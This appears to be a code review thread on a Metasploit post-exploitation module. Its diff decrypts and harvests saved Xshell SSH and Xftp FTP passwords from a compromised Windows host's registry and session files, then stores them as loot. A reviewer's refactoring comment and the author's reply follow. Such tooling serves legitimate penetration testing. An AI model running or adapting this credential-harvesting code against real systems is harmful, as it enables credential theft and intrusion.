modules/post/windows/gather/credentials/xshell_xftp_password.rb

```diff
@@ -0,0 +1,234 @@
+      raise 'No data to parse' if file.nil? || file.empty?
+
+      file = try_encode_file(file)
+      ini = Rex::Parser::Ini.from_s(file)
+      version, host, port, username, password = parser_xsh(ini)
+      xshell = NetSarangCrypto.new('xshell', version, user_profiles['UserName'], user_profiles['SID'])
+      xshell = NetSarangCrypto.new('xshell', version, user_profiles['UserName'], user_profiles['SID'], datastore['MASTER_PASSWORD']) if enable_master_passwd?(path)
+      is_valid = true
+      xshell_plaintext, is_valid = xshell.decrypt_string(password) if password
+      print_error('Invalid MASTER_PASSWORD, Decryption failed!') if !is_valid
+      config = {
+        type: 'ssh',
+        host: host,
+        port: port,
+        username: username,
+        password: xshell_plaintext
+      }
+      net_sarang_store_config(config)
+      tbl << ['Xshell_V' + version.to_s, item['name'], host, port, username, xshell_plaintext, password]
+    end
+    xfp.each do |item|
+      file = read_file(item['path'] + session.fs.file.separator + item['name'])
+      raise 'No data to parse' if file.nil? || file.empty?
+
+      file = try_encode_file(file)
+      ini = Rex::Parser::Ini.from_s(file)
+      version, host, port, username, password = parser_xfp(ini)
+      xftp = NetSarangCrypto.new('xftp', version, user_profiles['UserName'], user_profiles['SID'])
+      xftp = NetSarangCrypto.new('xftp', version, user_profiles['UserName'], user_profiles['SID'], datastore['MASTER_PASSWORD']) if enable_master_passwd?(path)
+      is_valid = true
+      xftp_plaintext, is_valid = xftp.decrypt_string(password) if password
+      print_error('Invalid MASTER_PASSWORD, Decryption failed!') if !is_valid
+      config = {
+        type: 'ftp',
+        host: host,
+        port: port,
+        username: username,
+        password: xftp_plaintext
+      }
+      net_sarang_store_config(config)
+      tbl << ['Xftp_V' + version.to_s, item['name'], host, port, username, xftp_plaintext, password]
+    end
+    print_line(tbl.to_s)
+  end
+
+  def run
+    print_status("Gather Xshell and Xftp Passwords on #{sysinfo['Computer']}")
+    profiles = grab_user_profiles
+    profiles.each do |user_profiles|
+      next if user_profiles['SID'].nil?
+
+      parent_key_6 = "HKEY_USERS\\#{user_profiles['SID']}\\Software\\NetSarang\\Common\\6\\UserData"
+      parent_key_5 = "HKEY_USERS\\#{user_profiles['SID']}\\Software\\NetSarang\\Common\\5\\UserData"
+      # get session file path
+      net_sarang_path_6 = expand_path(registry_getvaldata(parent_key_6, 'UserDataPath'))
+      net_sarang_path_5 = expand_path(registry_getvaldata(parent_key_5, 'UserDataPath'))
+
+      # enum session file
+      enum_version_5_session_file(net_sarang_path_5, user_profiles) if session.fs.file.exist?(net_sarang_path_5)
+      enum_version_6_session_file(net_sarang_path_6, user_profiles) if session.fs.file.exist?(net_sarang_path_6)
```

Comment:
All the `Rex::Text::Table` code in the `enum_version_5_session_file` and `enum_version_6_session_file` methods is duplicated. If in the future a `enum_version_7_session_file` method is added, that will lead to more duplication.

The table `columns` are exactly the same for each version. The `Header` is different for each table (based on filename), but how important is this information as a header? Perhaps the filename should be moved to a `column` ?

Is the distinction between versions 5 and 6 important outside of parsing? If not, the operator probably doesn't care whether it's version 5 or 6.

The typical approach is to have the methods which retrieve data (`enum_version_5_session_file`, `enum_version_6_session_file`) return a `Hash` of data which is then parsed, stored as `loot`, stored as `creds`, and printed in a `Table` in the `exploit` method. This is a much cleaner approach.

Reply:
Thanks for your correction, I have simplified the code according to the comments